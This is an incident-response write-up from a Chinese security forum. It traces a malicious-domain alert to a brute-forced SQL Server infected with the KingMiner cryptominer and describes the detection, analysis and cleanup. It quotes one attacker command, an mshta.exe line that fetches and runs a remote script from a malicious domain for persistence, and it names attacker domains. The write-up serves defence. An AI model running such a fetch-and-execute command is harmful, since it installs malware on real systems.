奇安信攻防社区-【实战】记一次实战“恶意外连”事件的应急响应

【实战】记一次实战“恶意外连”事件的应急响应

记一次实战“恶意外连”事件的应急响应

事件背景
----

忙碌了一天的沐师傅正准备下班，突然一个电话响起XX局被通报《"恶意外连"事件》，需要马上前往客户现场进行应急排查。于是乎沐师傅Wuwuuwu～，背起书包奔赴客户现场。

应急排查
----

### 沟通交流

到达现场后，通过与运维人员沟通了解事件原委：客户收到了上级通报称本单位有服务器/主机IP为`111.x.x.x`存在与恶意域名`news.g23xxx.com`进行通信行为，疑似遭受木马病毒攻击，需要应急排查事情原委，定位存在异常的主机/服务器。  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-fc471e6b64182293162414aa5cbbd59b3e2d5d7b.png)

### 定位异常主机/服务器

得知IP `x.x.x.x`为客户互联网出口IP地址，且互联网出入口侧无态势等流量检测设备，通过排查负载、IPS、深信服上网行为管理等日志均未发现内网主机服务器与恶意域名news.g23xxx.com、解析IP`（154.x.x.x）`相关访问日志。  
恶意域名进行分析后发现该恶意域名在威胁情报上被标记为KingMiner挖矿木马，僵尸网络，远控服务器。  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-e25abea2aafb58078d67343dc18f8642df36ff9e.png)  
对该恶意域名下的木马样本进行粗略查看，判断该挖矿木马是通过UDP协议进行通信，于是想了个办法，用`Wireshark`旁路到互联网出口上，抓取互联网出口侧全流量，对流量进行过滤筛选`udp &amp;&amp; frame.contains "g23xxx"`，终于发现存在恶意外连的流量请求，成功定位到异常服务器，内网IP地址为10.10.10.10（数据共享平台），为一台SQL Server数据库服务器。  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-b6d73ff198b96794d2a8feebef24de438fa861fe.png)

### 上机排查

遂即上机进行排查，进行日志、样本的提取，经过分析日志发现该主机存在大量恶意Powershell进程  
![image.jpeg](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-bd483f706ca323361fea0ad6d1957224cc07989e.jpeg)  
在SQL Server数据库日志中发现该服务器在`2022年3月4日11:17:02`到`2022年5月7日 21:45:15`期间遭受来自境外恶意IP `62.x.x.x`（俄罗斯莫斯科）、`62.x.x.x`（俄罗斯莫斯科）大量爆破行为，最终爆破成功。  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-324d3f5b861b037caed7eff46e702ac8ca30588d.png)  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-97a1f4337e33bfd10a00e2fc92fbd6be68418dbe.png)  
当数据库爆破成功后，该IP在服务器上执行了VBS脚本下载经过`base64编码`的二进制blob文件，经过解码后保存为`C:\\Users\\Public\\Downloads\\\\tool.exe`  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-44fcddce49238e806cd0de444761edd9a0eac3c3.png)  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-18c1cfcc4ba4b7a933d8d2654402c166635a5914.png)  
经过分析该文件`tool.exe`运行后会利用Windows权限提升漏洞`CVE-2019-0803`进行攻击，成功利用此漏洞的攻击者可以在内核模式下运行任意代码，然后可以安装程序；查看、更改或删除数据；或创建具有完全用户权限的新帐户。`tool.exe`在特权模式下执行命令`mshta.exe vbscript:GetObject(\\"script:http\[:\]//aa.30583fdae.tk/r1.txt\\")(window.close)`，通过`mshta.exe`执行脚本`r1.txt`来进行持久化。其中`tool.exe`所请求域名`aa.30583xxxx.tk`为门罗币挖矿木马地址，威胁情报已标记为恶意：  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-0762c28112cf92ddb15d0fcb313cd11c9ab84b46.png)  
`Tool.exe`文件沙箱分析结果：

![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-25bbab43eb357cda3f9e75dc5ac3fb7f3f8d48c9.png)

行为分析：  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-1bf61a0c8bf8554908b4d6f6a1053894f0c32409.png)

行为分析图：  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-2663995e61fb509c4fca79b31429dc1366589a88.png)

程序运行示例图：  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-db7dfb31b1c50a6f48697e06ce0741f0f7e65f3d.png)

其中下载的`r1.txt`会配置名为`WindowsSystemUpdate \_WMITimer`的计时器，并将执行一段脚本代码的事件消费者`WindowsSystemUpdate\_consumer`通过事件过滤器`WindowsSystemUpdate\_filter`绑定到计时器，从而通过计时器每15分钟执行一次下面的VBS脚本代码：  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-fd346d746bdc691adbc941126e820fcb45fe7108.png)  
WMI定时任务存在并已清除  
![image.jpeg](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-fb8670cc680e792d17a025ae8e999222e0854e4a.jpeg)

后续继续跟进分析发现，可能由于挖矿木马解析IP地址变更，或恶意域名不可达等原因，造成挖矿木马所需的部分程序或脚本未能成功下载到本地，经过排查，仅发现此处`tool.exe`所创建的wmi启动项，定时通过`nslookup`查询恶意域名`"news.g23xxx.com"` DNS记录，造成本服务器访问恶意域名`"news.g23xxx.com"`触发恶意外连告警。

在此次分析过程中，还发现该服务器还存在其他木马病毒，均已提取出样本并清除：  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-f659676151c28a27567ea799ddf907e1ee3872b7.png)  
![image.png](https://shs3.b.qianxin.com/attack_forum/2023/02/attach-b91939056229a2f9ca789f74946ae580fc5f6960.png)  
至此，此次事件初步排查完成，客户已对该服务器进行断网处理，经过全盘木马病毒查杀，启动项删除，并在防火墙上封禁了该恶意域名与IP地址。

应急事件总结
------

【被攻击服务器】：`SQL Server`服务器，数据共享平台  
【攻击链路】：攻击者针对`Windows`服务器`MSSQL`进行爆破攻击，爆破入侵成功后，首先执行一段`VBS`脚本，检测操作系统版本，并根据不同的系统版本下载不同的`Payload`文件，利用下载的文件`tool.exe`进行`(CVE-2019-0803)`提权以及门罗币挖矿。同时还会安装`WMI定时器`和`Windows计划任务`来反复执行指定脚本，执行服务器返回的恶意代码达到持久化攻击的目的；  
【木马病毒类型】：挖矿木马，挖矿类型：`KingMiner`门罗币；  
【安全设备运行情况】：IPS、深信服上网行为管理、服务器本地“火绒”杀毒软件未检测出异常；  
【处置情况】：已成功定位存在异常的内网服务器，已做断网处理，已进行全盘查杀、日志提取、样本提取等工作，客户反馈该服务器已闲置，后续不再投入使用；  
【持续监控】：后续将部署态势感知设备，对恢复后的网站持续监测。

发表于 2023-02-17 09:00:02
阅读 ( 8221 )
分类：应急响应

【实战】记一次实战“恶意外连”事件的应急响应

0 条评论